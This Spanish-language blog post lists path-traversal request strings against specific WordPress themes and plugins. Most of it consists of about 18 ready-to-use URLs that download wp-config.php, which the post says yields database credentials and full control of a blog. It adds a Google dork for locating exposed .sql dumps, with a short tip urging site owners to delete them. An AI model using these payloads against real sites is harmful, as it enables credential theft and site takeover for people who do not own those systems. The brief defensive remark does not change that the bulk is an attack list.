Google Dorks para acceder a wp-config.php

Estos son los últimos dorks o cadenas de búsqueda que se están utilizando para acceder y descargar el archivo wp-config, con la consiguiente substracción del usuario y password de la base de datos, y en definitiva, hacerse con el control total de un blog wordpress de forma limpia.

Las cadenas de búsqueda más empleadas para explotar este bug son:
/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 /wp-content/force-download.php?file=../wp-config.php
/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php
/wp-content/themes/SMWF/inc/download.php?file=../wp-config.php
 /wp-content/themes/markant/download.php?file=../../wp-config.php
/wp-content/themes/yakimabait/download.php?file=./wp-config.php
 /wp-content/themes/TheLoft/download.php?file=../../../wp-config.php
 /wp-content/themes/felis/download.php?file=../wp-config.php
/wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php
/wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php
/wp-content/themes/epic/includes/download.php?file=wp-config.php
/wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php
/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
 /wp-content/themes/lote27/download.php?download=../../../wp-config.php
/wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php
/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php
									

También si se ha migrado recientemente la base de datos, o bien, se importa para su uso a partir de algún plugin, se recomienda borrar con urgencia de la carpeta /uploads/ el archivo .sql ya que existe un dork con capacidad de buscarlo y saber la ubicación para su descarga:

inurl:/wp-content/uploads/ filetype:sql
									

Deja tu comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *